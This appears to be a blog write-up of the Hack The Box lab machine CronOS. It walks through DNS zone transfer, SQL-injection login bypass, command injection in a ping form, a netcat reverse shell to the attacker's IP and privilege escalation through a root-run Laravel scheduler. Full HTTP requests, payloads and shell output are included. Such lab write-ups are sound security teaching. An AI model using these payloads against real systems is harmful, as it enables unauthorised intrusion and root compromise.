CronOS

CronOS info-card WriteUp

Enumeration

1. Nmap

nmap -sV -oA nmap-out 10.10.10.13
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So, we are dealing with an Ubuntu machine that is hosting a WebApp. Port 53 is also open and an ISC BIND service running on it. Let’s research on it a little bit more.

[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.

I was having problems connecting to the web service so I added the IP (10.10.10.13) to the /etc/hosts file with the name cronos.htb.

2. DNS Enumeration

Check out the video from hackersploit and learn about dns enumeration and zone transfers to understand the following lines.

$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800  IN  NS  ns1.cronos.htb.
cronos.htb.        604800  IN  A   10.10.10.13
admin.cronos.htb.    604800  IN  A   10.10.10.13
ns1.cronos.htb.        604800  IN  A   10.10.10.13
www.cronos.htb.        604800  IN  A   10.10.10.13
cronos.htb.        604800  IN  SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)

I have found a couple of domains linked to cronos. Let’s add them to the /etc/hosts file too in order to access them on the browser.

Admin.cronos.htb & SQLi

By going to admin.cronos.htb , a login page was displayed.
An innocent SQLi check let’s us in.

Two tools are running on the welcome.php page. Ping and traceroute. From Burp, I have poked the application and discovered command injection.

Request

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Bls+.

I have encoded a semicolon and added the ls command for the current directory.

Response

HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8

<html">

   <head>
      <title>Net Tool v0.1 </title>
   </head>

   <body>
    <h1>Net Tool v0.1</h1>
    <form method="POST" action="">
    <select name="command">
        <option value="traceroute">traceroute</option>
        <option value="ping -c 1">ping</option>
    </select>
    <input type="text" name="host" value="8.8.8.8"/>
    <input type="submit" value="Execute!"/>
    </form>
            config.php<br>
        index.php<br>
        logout.php<br>
        session.php<br>
        welcome.php<br>
              <p><a href = "logout.php">Sign Out</a></p>
   </body>

</html>

So, we now know there is a command injection vulnerability. Let’s see if we could locate netcat in order to connect to the victim host.

Request

<deleted>
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Blocate+nc

Response

<deleted>
cute!"/>
    </form>
            /bin/loginctl<br>
        /bin/nc<br>
        /bin/nc.openbsd<br>
</deleted>

There is a netcat binary on the machine. Let’s try to use it to our advantage.

Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Bnc+10.10.14.2+1234+-e+/bin/bash

nc 10.10.14.2 1234 -e /bin/bash was unsuccessful. Perhaps an URI encoding problem?

Check out this Reverse Shell Cheat Sheet

After trying some of the shells, finally the python2.7 one, done did it again! And we have a shell as www-data.

# nc -nlvp  1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.13] 51718
/bin/sh: 0: can't access tty; job control turned off
$ id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

After running sudo -l I was receiving no tty present. So I tried to upgrade my shell:

$ sudo -l
sudo: no tty present and no askpass program specified

$ python -c 'import pty;pty.spawn("/bin/bash")'

[email protected]:/home/noulis$ export TERM=xterm-256color
export TERM=xterm-256color

[email protected]:/home/noulis$ ^Z

[1]+  Stopped                 nc -nlvp 1234

# stty raw -echo

# fg
[1]+  Started                 nc -nlvp 1234

[email protected]:/home/noulis$ stty rows 25 columns 237
[email protected]:/home/noulis$ whoami
www-data
[email protected]:/home/noulis$ sudo -l
[sudo] password for www-data: 
Sorry, try again.

Now that it works as expected. Let’s move on to:

Privesc

Crontab is a task scheduler in linux systems. It is usually the very first thing I check when doing linux boxes. To check if there are any scheduled tasks, I have “catted” the /etc/crontab file:

$ cat /etc/crontab

# m h dom mon dow user    command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *    root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

It seems root is running a php file artisan from within /var/www/laravel/. Let’s see what this file is and what it does.

$ cat artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);

$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/

$kernel->terminate($input, $status);

exit($status);
[email protected]:/var/www/laravel$ 

So any command that is inserted from the CLI will be executed in this console as root. I need more information about that tho.

Laravel scheduling tasks

After a while of poking around artisan commands, I have found this website that sheds light about:

Scheduling Shell Commands

The exec method may be used to issue a command to the operating system:

$schedule->exec('node /home/forge/script.js')->daily();

Finally, to gain the root flag, I am copying the root.txt file to tmp, changing its ownership from root to www-data (me), and assigning it permissions in order to be accessible.

protected function schedule(Schedule $schedule)
    {
        $schedule->exec('cp /root/root.txt /tmp/;chown www-data:www-data /tmp/root.txt; chmod 4755 /tmp/root.txt')->everyMinute();
        // $schedule->command('inspire')
        //          ->hourly();
    }

A minute later, we have a root.txt with the following permissions in /tmp/:

$ ls -la
total 40
drwxrwxrwt  9 root     root     4096 Apr 13 15:17 .
drwxr-xr-x 23 root     root     4096 Apr  9  2017 ..
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .ICE-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .Test-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .X11-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .XIM-unix
drwxrwxrwt  2 root     root     4096 Apr 13 14:28 .font-unix
-rw-r--r--  1 root     root        0 Apr 13 15:11 catted.txt
-rwsr-xr-x  1 www-data www-data   33 Apr 13 15:17 root.txt
drwx------  3 root     root     4096 Apr 13 14:28 systemd-private-162edecf88ca4801b7de1bd826d2c653-systemd-timesyncd.service-JYRg0U
drwx------  2 root     root     4096 Apr 13 14:28 vmware-root

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: